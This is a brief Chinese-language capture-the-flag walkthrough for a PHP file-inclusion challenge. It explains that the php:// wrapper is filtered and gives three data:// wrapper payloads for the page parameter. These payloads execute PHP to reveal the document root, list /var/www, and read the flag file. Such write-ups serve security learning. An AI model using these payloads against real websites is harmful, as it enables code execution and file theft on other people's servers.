解题思路
打开实例,查看php代码
文件包含
php://协议被过滤,考虑data://协议
动作指导
找到目录路径:?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']; >
读取当前目录:?page=data://text/plain,<?php print_r(scandir('/var/www')); ?>
读取flag文件:?page=data://text/plain,<?php $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>